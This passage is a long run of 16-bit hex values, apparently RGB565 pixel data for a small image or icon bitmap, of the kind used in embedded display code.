0xffff, 0xfffd, 0xfffd, 0xfffe, 0xffff, 0xf7df, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xc67d, 0x6391, 0xefff, 0x95f8, 0x01d1, 0x8d7b, 0xffdf, 0xffdd, 0xffde, 0xf7ff, 0xdfff, 0x4cb6, 0x0b52, 0xa77f, 0xf7ff, 0xffdd, 0xffdf, 0xffff, 0xf7ff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xb77f, 0x1bf4, 0x13b3, 0xd7ff, 0xef9e, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xffdc, 0xfffe, 0xefff, 0x3aef, 0xcf5f, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xf7ff, 0xd79f, 0x3acf, 0xefff, 0xffff, 0xfffe, 0xffde, 0xffbf, 0xffbf, 0xffff, 0xd7ff, 0x2bf4, 0x23d3, 0xb79f, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xf7df, 0xf7ff, 0xb6fd, 0x2373, 0x2c79, 0xefff, 0xffff, 0xfffe, 0xffff, 0xcedb, 0xa577, 0xf7ff, 0xf7de, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xbe79, 0xadf8, 0xf7ff, 0xffdf, 0xffff, 0x8c93, 0xae5c, 0x64b6, 0x8557, 0xefff, 0xefff, 0x7494, 0x8dda, 0x8599, 0xadf9, 0xffdf, 0xff9e, 0xffdf, 0xffff, 0xffdd, 0xf7ff, 0xbfbf, 0x2392, 0x2bd1, 0xcfff, 0xe7ff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0xdfff, 0x4c35, 0x0b54, 0xb77f, 0xf7ff, 0xf7fe, 0xefff, 0x74d4, 0xdfff, 0x7cd4, 0xa5f9, 0x6412, 0x6412, 0x6432, 0x5c13, 0x53f3, 0x7d17, 0x8db7, 0xc6ba, 0xd77d, 0x6410, 0xbedd, 0x7495, 0xe7bf, 0x9db8, 0xf7ff, 0xf7bf, 0xffde, 0xffdd, 0xffff, 0x7455, 0xb6df, 0x8538, 0xa639, 0xdf5f, 0xffde, 0xfffe, 0xe7ff, 0x551a, 0x0b75, 0x863d, 0xefff, 0xfffd, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffdf, 0xffde, 0xffff, 0xfffe, 0xffdf, 0xf7ff, 0xc7bf, 0x2bf5, 0x1b94, 0xb75f, 0xf7ff, 0xfffe, 0xf7ff, 0xefdf, 0xffff, 0xffff, 0xf7ff, 0xf7dd, 0xfffe, 0xffff, 0xbebf, 0x09cc, 0xb69d, 0xffff, 0xffdf, 0xc71f, 0x020e, 0x865e, 0xf7ff, 0xffdf, 0xcf3f, 0x0251, 0xa5da, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xffdf, 0xffdd, 0xfffd, 0xffde, 0xf7df, 0xefff, 0x4454, 0x13b4, 0x769f, 0xe7ff, 0xffdd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffbd, 0xf7ff, 0x865e, 0x0334, 0x5539, 0xdfff, 0xffbe, 0xfffd, 0xf7bc, 0xfffd, 0xffff, 0xffde, 0xf7fe, 0xe7ff, 0x3353, 0x1315, 0x0b58, 0x0316, 0x1b98, 0x1336, 0x1336, 0x1356, 0x1356, 0x1336, 0x1377, 0x0357, 0x0378, 0x1357, 0x1271, 0x9e1d, 0xefff, 0xf7df, 0xffde, 0xffbe, 0xffff, 0xffde, 0xffff, 0xffdf, 0x9f9f, 0x0b53, 0x3414, 0xdfff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xdfff, 0x5dfc, 0x0b51, 0x7599, 0xdfff, 0xefff, 0xffbf, 0xffdf, 0xc6be, 0x1290, 0x0a70, 0xdfdf, 0xffff, 0x528c, 0xdfff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xeffe, 0xf7ff, 0x5330, 0xdf7f, 0xdfff, 0x3b71, 0x0234, 0x8d9e, 0xffff, 0xffbd, 0xffbe, 0xefff, 0x8e5d, 0x1372, 0x4495, 0xdfff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xe7ff, 0x4d39, 0x0b93, 0x7dfb, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xfffc, 0xffff, 0xefff, 0x6c95, 0x95da, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffd, 0xfffd, 0xf7ff, 0x9dd9, 0x7496, 0xffff, 0xffbf, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xefff, 0x6ddd, 0x0396, 0x5519, 0xefff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0x4c76, 0x0b75, 0x9e7b, 0xefff, 0xf7ff, 0xf7ff, 0xc71c, 0x9db7, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xbe7a, 0xadf8, 0xffff, 0xffff, 0xffde, 0xffff, 0x5baf, 0xa67a, 0xdfff, 0xefff, 0xefff, 0xefff, 0x7cb5, 0x8cd5, 0xffff, 0xffbe, 0xffff, 0xf7fe, 0xeffd, 0xffbb, 0xe7ff, 0x5d3c, 0x1b74, 0x7577, 0xefff, 0xefff, 0xf7df, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xefff, 0x9e1b, 0x03b7, 0x4c75, 0xf7ff, 0xffbe, 0xefff, 0x7d17, 0xd7bf, 0x7c93, 0xefff, 0xefff, 0xc6ff, 0xefff, 0xd79f, 0xe7ff, 0xe7ff, 0xa5b8, 0xb638, 0xefff, 0xe7ff, 0xbe9b, 0x8cf6, 0xdf9f, 0x9577, 0xefff, 0xffff, 0xffbe, 0xffde, 0xf7ff, 0x8ddb, 0x963d, 0x6c53, 0x740f, 0x84d7, 0xf7ff, 0xf7ff, 0xbf7f, 0x1b73, 0x3417, 0xd7df, 0xf7df, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffdf, 0xffff, 0xf7fe, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0x8e9e, 0x0b95, 0x2c78, 0xdfff, 0xf7fe, 0xffff, 0xefff, 0xefff, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xf7ff, 0xa5de, 0x1a0e, 0xdf7e, 0xfffd, 0xef3d, 0x222f, 0x23b9, 0x0250, 0xc6de, 0xffdf, 0xefbf, 0x2b11, 0x9496, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffdc, 0xffdc, 0xf7ff, 0x85fc, 0x1bb4, 0x3c75, 0xd7ff, 0xf7ff, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xdfff, 0x3455, 0x1373, 0x86bf, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0xf7df, 0xffff, 0xffde, 0xf7ff, 0xd7bf, 0x01ad, 0x1b36, 0x1378, 0x0337, 0x0b78, 0x0b57, 0x1357, 0x0b76, 0x0357, 0x0b58, 0x0b99, 0x1357, 0x0a10, 0x6436, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xffdf, 0xfffe, 0xfffe, 0xf7ff, 0xefdf, 0x0c7c, 0x0b75, 0xa6bd, 0xf7ff, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xefff, 0xcfff, 0x2bf3, 0x1374, 0xa75f, 0xe7ff, 0xffbd, 0xffde, 0xc6df, 0x0295, 0x02b4, 0x95db, 0xffff, 0x8433, 0x9dfe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xcf1c, 0x42ee, 0xdfff, 0xb71f, 0x0a71, 0x02b6, 0x7d9e, 0xffff, 0xff7c, 0xffdf, 0xd7ff, 0x1395, 0x1bb4, 0xaefd, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffdd, 0xffde, 0xf7ff, 0xc79f, 0x2393, 0x23b4, 0xbf5f, 0xf7df, 0xfffd, 0xf7fe, 0xe7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xcf5f, 0x2a4b, 0xe7ff, 0xefff, 0xfffe, 0xffdd, 0xffde, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xfffd, 0xf7bd, 0xefff, 0x328c, 0xdf7f, 0xffff, 0xffdf, 0xffbf, 0xf7ff, 0xf7ff, 0xf7ff, 0xbf5f, 0x1bf6, 0x03b7, 0xc7ff, 0xfffd, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0xbf5f, 0x1b32, 0x2417, 0xcfff, 0xf7ff, 0xf7ff, 0xbefc, 0x95b8, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xbe5b, 0xadf9, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0x9d96, 0x6411, 0x6453, 0x6412, 0x6c12, 0xce9b, 0xffff, 0xf79d, 0xffff, 0xf7be, 0xf7dd, 0xf7fd, 0xf7ff, 0xaf3f, 0x0b55, 0x33d6, 0xd7df, 0xf7ff, 0xf7de, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0x1cb9, 0x1b73, 0xa61c, 0xffff, 0xffff, 0x7c95, 0xd7ff, 0x4bd2, 0x5c33, 0x6c75, 0x6c14, 0x6bf5, 0x6c35, 0x6455, 0x6c54, 0x5350, 0xdf7f, 0xd75e, 0x6c31, 0xcefe, 0x8cd5, 0xdf9f, 0x95d9, 0xe7ff, 0xefff, 0xffff, 0xffff, 0xf7ff, 0x7d98, 0x6d37, 0xe7ff, 0xf7ff, 0x9d79, 0xe7ff, 0xcfff, 0x44b5, 0x1331, 0x9e9e, 0xe7df, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbd, 0xffdd, 0xdfff, 0x451b, 0x0397, 0x6d9b, 0xe7ff, 0xfffe, 0xffff, 0xf7ff, 0xf7df, 0xf7ff, 0xfffe, 0xfffd, 0xffff, 0xadff, 0x19ce, 0xd77f, 0xfffd, 0xdf3c, 0x224f, 0x33b9, 0x0211, 0xb65c, 0xffff, 0xe79f, 0x32d1, 0x9cb6, 0xffdf, 0xffff, 0xf7fd, 0xf7fe, 0xefff, 0xf7ff, 0xfffe, 0xf7ff, 0xbf5f, 0x1bb5, 0x1b74, 0xbf3f, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffbf, 0xffde, 0xefff, 0xaf3e, 0x1b72, 0x13b6, 0xd79f, 0xf7ff, 0xf7fe, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffbd, 0xffff, 0xc6ff, 0x22b1, 0x0273, 0x1398, 0x0399, 0x0338, 0x0b7a, 0x0398, 0x0359, 0x0b59, 0x1317, 0x0a30, 0x6c76, 0xf7ff, 0xffff, 0xf7de, 0xf7ff, 0xf7ff, 0xffff, 0xffdd, 0xfffe, 0xe7ff, 0x6d79, 0x03fa, 0x4d1a, 0xe7ff, 0xffdd, 0xffde, 0xffff, 0xf7fe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xffff, 0xffff, 0x9e5c, 0x1374, 0x2c38, 0xcfff, 0xfffd, 0xffdd, 0xbeff, 0x02b6, 0x0317, 0x5c77, 0xf7ff, 0xa5da, 0x4b95, 0xf7ff, 0xefde, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffdf, 0xffdf, 0xf7ff, 0x8d34, 0x6c72, 0xdfff, 0x85de, 0x0a93, 0x0295, 0x85bc, 0xffff, 0xffdd, 0xe7ff, 0x44b9, 0x0bb7, 0x5d7a, 0xe7ff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xffbf, 0xffff, 0x965c, 0x0b54, 0x3c99, 0xe7ff, 0xffdd, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xf7be, 0xffff, 0x8d15, 0x5b8f, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffff, 0xffff, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0x5350, 0x9577, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xd7ff, 0x3476, 0x0b94, 0x7e1d, 0xefff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xe7ff, 0x7d38, 0x03d9, 0x44b8, 0xefff, 0xffff, 0xc6db, 0x9db8, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xc69d, 0xadf9, 0xf7ff, 0xffdf, 0xf7ff, 0xf7ff, 0xffbf, 0xffff, 0xf7ff, 0x9599, 0xcf3f, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xffbf, 0xffbe, 0xffff, 0xafff, 0x2c57, 0x1b75, 0xa6df, 0xefff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffde, 0xfffe, 0xefff, 0x9fbf, 0x13b5, 0x2b96, 0xbf3f, 0xf7ff, 0x8452, 0x95b9, 0xa6be, 0x9e9d, 0xae5b, 0xbe7d, 0xbe7e, 0xae5d, 0xae7d, 0xa65c, 0xb69d, 0xb65b, 0xb67c, 0xbede, 0x7cf6, 0x84d5, 0xdfdf, 0x7cf5, 0xbf3e, 0xc71e, 0xcedc, 0xd6fb, 0xd71c, 0x7cf3, 0x7d35, 0xbf1e, 0xc71f, 0x9494, 0xdfff, 0x5ddd, 0x0b73, 0x4cd6, 0xe7ff, 0xeffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xf7ff, 0xbfff, 0x1bb6, 0x1375, 0x9edf, 0xefff, 0xffdc, 0xfffd, 0xffde, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xcf1f, 0x098d, 0x8dbb, 0xdfff, 0xe7ff, 0xb69c, 0x4353, 0x8d7b, 0xf7ff, 0xf7ff, 0xbedf, 0x014f, 0xc63a, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xffdd, 0xffde, 0xefff, 0xcfff, 0x2c37, 0x0b74, 0x861c, 0xf7ff, 0xffdd, 0xffdd, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffbf, 0xffdf, 0xffde, 0xf7fe, 0xe7ff, 0x75ba, 0x1b95, 0x3457, 0xcfdf, 0xf7bf, 0xffde, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xd73f, 0x5c57, 0x0251, 0x0315, 0x02f6, 0x0b17, 0x02d5, 0x0af6, 0x0273, 0x22f2, 0x95da, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xefff, 0x75fc, 0x0bb6, 0x1bb5, 0xcfff, 0xf7fe, 0xffbd, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffbe, 0xffdf, 0xf7ff, 0x6539, 0x0b33, 0x5519, 0xdfff, 0xffff, 0xbedd, 0x0a30, 0x0a73, 0x4372, 0xefff, 0xbebe, 0x1a0f, 0xe73c, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffbe, 0xffdf, 0xf7ff, 0x42ac, 0x8d36, 0xe7ff, 0x6cd8, 0x020f, 0x122f, 0x9578, 0xffff, 0xe7ff, 0x65bb, 0x0b96, 0x3c98, 0xcfff, 0xefff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xe7ff, 0x3c98, 0x0b76, 0x54fa, 0xe7ff, 0xffff, 0xff9c, 0xfffe, 0xffbe, 0xffdf, 0xffff, 0xf7ff, 0x63b0, 0x7412, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0x6bd3, 0x6413, 0xefff, 0xefdf, 0xfffe, 0xff7c, 0xffbc, 0xfffe, 0xdfff, 0x559b, 0x0374, 0x4475, 0xefff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xf7ff, 0xefbf, 0x1c5a, 0x1374, 0x7dda, 0xe7ff, 0xef9f, 0x73d0, 0x8cd4, 0x9d76, 0x9d76, 0x9576, 0x9557, 0x9557, 0x9538, 0x6bd2, 0xbe5a, 0xf7ff, 0xffff, 0xffff, 0xf7de, 0xffdf, 0xdebc, 0xd71f, 0x7496, 0xa5fb, 0xce9c, 0xf77e, 0xf7fe, 0xeffe, 0xffde, 0xffbe, 0xf7df, 0xefff, 0x1cdb, 0x13d5, 0x5cf7, 0xefff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xf7fd, 0xdfff, 0x6dbb, 0x0b56, 0x2c38, 0xcfff, 0xd77e, 0x9d56, 0x9db8, 0x95b8, 0x9596, 0x9d77, 0xa578, 0x9d98, 0x8db8, 0x95b8, 0x9db9, 0x9d77, 0x9d78, 0x8d57, 0xa619, 0xdfbf, 0xe7ff, 0xae19, 0x9d97, 0x9d97, 0xa5b7, 0xa596, 0x9d54, 0xd71b, 0xd71b, 0xa577, 0x9d38, 0xcefd, 0x969f, 0x0b95, 0x2416, 0xc7df, 0xf7fe, 0xfffe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffd, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xfffd, 0xefff, 0x9ebd, 0x2395, 0x0b14, 0xa71f, 0xefff, 0xfffc, 0xff9c, 0xefde, 0xf7df, 0xffff, 0xf7ff, 0xefff, 0x4bb2, 0x09ef, 0xd7ff, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xdfff, 0x3312, 0x1275, 0xefff, 0xefdf, 0xf7de, 0xfffe, 0xffbd, 0xffdc, 0xffff, 0xcfff, 0x349a, 0x0377, 0x5d3a, 0xefff, 0xfffe, 0xffde, 0xf7de, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7dd, 0xf7ff, 0xe7ff, 0x5475, 0x03d8, 0x3c98, 0xe7ff, 0xffbe, 0xfffe, 0xffff, 0xf7df, 0xffdf, 0xffff, 0xffde, 0xf7df, 0xf7ff, 0xc73f, 0x7d7a, 0x5c36, 0x4373, 0x53b5, 0x74d8, 0xae7d, 0xe7ff, 0xefff, 0xf7df, 0xf7df, 0xf7ff, 0xf7de, 0xfffe, 0xffdd, 0xffde, 0xdfff, 0x8ebe, 0x13b5, 0x0b77, 0xb6fc, 0xf7ff, 0xffdd, 0xffff, 0xf7df, 0xefff, 0xf7ff, 0xffdf, 0xffde, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xdfff, 0x3c56, 0x0376, 0x44da, 0xdfff, 0xcf1c, 0x7c94, 0x6c76, 0x84f5, 0xefff, 0xdf7f, 0x63b4, 0xdedc, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xff9e, 0xffff, 0xef9f, 0x73f1, 0xc69b, 0xf7ff, 0x9598, 0x6c96, 0x7433, 0xb639, 0xe7ff, 0x6dfb, 0x13d6, 0x1374, 0xcfdf, 0xf7ff, 0xf7fd, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xf7ff, 0xefff, 0xcfdf, 0x2bb5, 0x13b7, 0x5d9d, 0xe7ff, 0xffbd, 0xffbd, 0xffbe, 0xffdf, 0xf7bf, 0xffff, 0xf7ff, 0x7433, 0x328e, 0xae7e, 0xefff, 0xf7ff, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0xae3c, 0x3a6e, 0x7454, 0xefff, 0xefdf, 0xf7ff, 0xffdf, 0xffbd, 0xffbc, 0xe7ff, 0x5dba, 0x03d5, 0x2456, 0xdfff, 0xffdd, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xf7de, 0xffff, 0xc77f, 0x2373, 0x1393, 0x761c, 0xe7ff, 0xdedc, 0xa535, 0xd73d, 0xcf3e, 0xcf1d, 0xcf1d, 0xd75e, 0xa5d9, 0xb61a, 0xf7ff, 0xf7be, 0xf7de, 0xf7fe, 0xfffe, 0xffff, 0xc618, 0x9d98, 0xa63c, 0xa5da, 0xad98, 0xd69b, 0xffff, 0xeffe, 0xf7ff, 0xf7ff, 0xdfff, 0x5d19, 0x03f9, 0x2c16, 0xe7ff, 0xffde, 0xffde, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffc, 0xf7fe, 0xe7ff, 0x54f9, 0x03b5, 0x2cb8, 0xcfff, 0xf7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0xefff, 0xefff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0x9ede, 0x1bb3, 0x13d4, 0x96fe, 0xf7ff, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffd, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffbd, 0xf7dc, 0xefff, 0x9ebe, 0x1334, 0x1b95, 0x863c, 0xe7ff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdd, 0xf7fe, 0xdfff, 0x32d1, 0x096d, 0xa5fc, 0xe7df, 0xefff, 0xe7ff, 0xb6bc, 0x224d, 0x09cd, 0xaedf, 0xefff, 0xf7fe, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xc79f, 0x3415, 0x0315, 0x54fb, 0xe7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0x34db, 0x1374, 0x3bf4, 0xd7ff, 0xefff, 0xefdf, 0xf7df, 0xffff, 0xfffe, 0xffbd, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7fe, 0xffff, 0xffde, 0xffdf, 0xefff, 0x6dbb, 0x13f6, 0x1374, 0xa6df, 0xfffe, 0xffdd, 0xfffe, 0xf7be, 0xffff, 0xf7ff, 0xffff, 0xf7bf, 0xffde, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xeffe, 0xcfff, 0x3459, 0x13b7, 0x3456, 0xd7ff, 0xefff, 0xf7ff, 0xffff, 0xf7fe, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffbf, 0xfffe, 0xfffd, 0xf7fe, 0xf7ff, 0xf7df, 0xfffe, 0xfffd, 0xffde, 0xffff, 0xffdf, 0xff9e, 0xffff, 0xf7ff, 0xefff, 0xdfff, 0x659b, 0x1395, 0x1b95, 0xb75f, 0xf7ff, 0xffdc, 0xfffd, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0xe7ff, 0xefff, 0xf7ff, 0xd7df, 0x1b95, 0x0376, 0x5d39, 0xe7ff, 0xf7ff, 0xffff, 0xf7df, 0xffff, 0xffdf, 0xf7ff, 0xefff, 0xd77f, 0x53b2, 0x222b, 0x5b70, 0x7c73, 0x7c73, 0x5390, 0x2a6c, 0x53d2, 0xd73f, 0xf7ff, 0xfffe, 0xffff, 0xf7bf, 0xffbf, 0xffff, 0xe7ff, 0x4cf7, 0x0c15, 0x1c15, 0xbf9f, 0xf7ff, 0xfffe, 0xf79e, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xfffd, 0xffbe, 0xefdf, 0xc7bf, 0x1bb4, 0x0bb5, 0x553a, 0xe7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xefdf, 0xf7de, 0xffde, 0xf7ff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xefff, 0xe7ff, 0xf7ff, 0xffff, 0xffbf, 0xffdf, 0xefdf, 0xe7ff, 0xc7ff, 0x44d7, 0x0374, 0x3437, 0xd7ff, 0xffff, 0xf77c, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffdd, 0xffde, 0xffdf, 0xe7ff, 0x5518, 0x03b5, 0x2c57, 0xcfbf, 0xffff, 0xfffe, 0xf7dd, 0xffde, 0xff9e, 0xffde, 0xfffe, 0xffdd, 0xfffd, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffbe, 0xffff, 0xffbf, 0xffbe, 0xffdd, 0xffbd, 0xffff, 0xf79f, 0xffbf, 0xffdf, 0xefff, 0x9dda, 0x0b93, 0x1bd3, 0x96dc, 0xe7ff, 0xffbe, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xf7fe, 0xf7fe, 0xefff, 0xa6de, 0x1354, 0x0bb6, 0x4cf9, 0xcfff, 0xf7ff, 0xffbf, 0xffdf, 0xfffe, 0xf7de, 0xf7ff, 0xe7bf, 0x6c35, 0x19cc, 0x11ec, 0x228d, 0x124d, 0x09cd, 0x4b73, 0xd73f, 0xf7ff, 0xffbe, 0xfffe, 0xffde, 0xefdf, 0xdfff, 0x86bf, 0x0bd5, 0x13b4, 0x64f8, 0xefff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xf7bd, 0xe7ff, 0x5cd7, 0x0b74, 0x1bd6, 0x967f, 0xe7ff, 0xffff, 0xffdd, 0xffbe, 0xffff, 0xffdf, 0xf7dd, 0xfffd, 0xffdd, 0xffbe, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffde, 0xffbd, 0xfffd, 0xfffe, 0xf7ff, 0xd7df, 0x4478, 0x13d7, 